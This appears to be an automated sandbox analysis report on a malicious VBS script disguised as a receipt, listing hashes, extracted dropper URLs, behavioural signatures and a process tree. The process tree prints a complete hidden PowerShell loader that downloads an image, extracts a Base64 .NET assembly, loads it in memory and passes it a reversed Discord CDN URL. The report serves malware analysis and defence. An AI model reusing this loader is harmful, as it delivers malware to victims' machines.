Analysis

  • max time kernel
    121s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    20/09/2024, 01:21

General

  • Target

    ico/receipt#295.vbs

  • Size

    526KB

  • MD5

    ed7c0924f17062f0a8529be119ac681f

  • SHA1

    7b2fe31aab29c926aee9917955b63c882565a6a8

  • SHA256

    2be32404db27ff805fc5d7293a7daaf6955613637852580b6bd744d061df28f2

  • SHA512

    6347509f3160134d14a8c1623f0e128845fd413c6e1a0ce3ec3a95117b143ed28cf626fdb2f7f810c1630e24834cc6c3c3b2690f3144c446186169404d443f36

  • SSDEEP

    12288:0KGqe3sjWlECjW5J5fbFFhvFpt05P8eli+tTebpFJr+kCp2Y5m9MoqHzqra/:pKxjgTv90

Score
10/10

Malware Config

Extracted

  • Language

    ps1

  • Deobfuscated

  • URLs

    ps1.dropper

    https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg

    exe.dropper

    https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ico\receipt#295.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2400
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[obfuscated Base64 payload removed]';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('≱ ➲ ᭷ ꒶ ䷯','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1864
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&65e171ce543885d8e9443b2cbb307803727d16de6b32812f49cf238222dfa30b=mh&c4a70e66=si&ccbc1e66=xe?txt.sgnul/2637239195198013821/9383005657928061811/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'vinhal','AddInProcess32',''))"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2088

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IIEGQ3EFW3ESJY3FVREM.temp

    Filesize

    7KB

    MD5

    2d11d27d3d6b2021bef1495540472c36

    SHA1

    18aea64a5b9e83ef9fd55b37072d698ffdb8bf95

    SHA256

    3f0183b37928e0a5466cde99769932c0f69adaa07bf3f5c1a948499512fc3228

    SHA512

    a220490f765ff91cf39b40eda93a517125f91b06865130e7a2539212993bbc2cde6d79f71739e9fabc0d94a469a3226b20027df25275b69c5c562ef1ac54d34b

  • memory/1864-4-0x000007FEF62BE000-0x000007FEF62BF000-memory.dmp

    Filesize

    4KB

  • memory/1864-7-0x000007FEF6000000-0x000007FEF699D000-memory.dmp

    Filesize

    9.6MB

  • memory/1864-6-0x0000000002860000-0x0000000002868000-memory.dmp

    Filesize

    32KB

  • memory/1864-5-0x000000001B550000-0x000000001B832000-memory.dmp

    Filesize

    2.9MB

  • memory/1864-8-0x000007FEF6000000-0x000007FEF699D000-memory.dmp

    Filesize

    9.6MB

  • memory/1864-9-0x000007FEF6000000-0x000007FEF699D000-memory.dmp

    Filesize

    9.6MB

  • memory/1864-15-0x000007FEF6000000-0x000007FEF699D000-memory.dmp

    Filesize

    9.6MB

  • memory/1864-16-0x000007FEF6000000-0x000007FEF699D000-memory.dmp

    Filesize

    9.6MB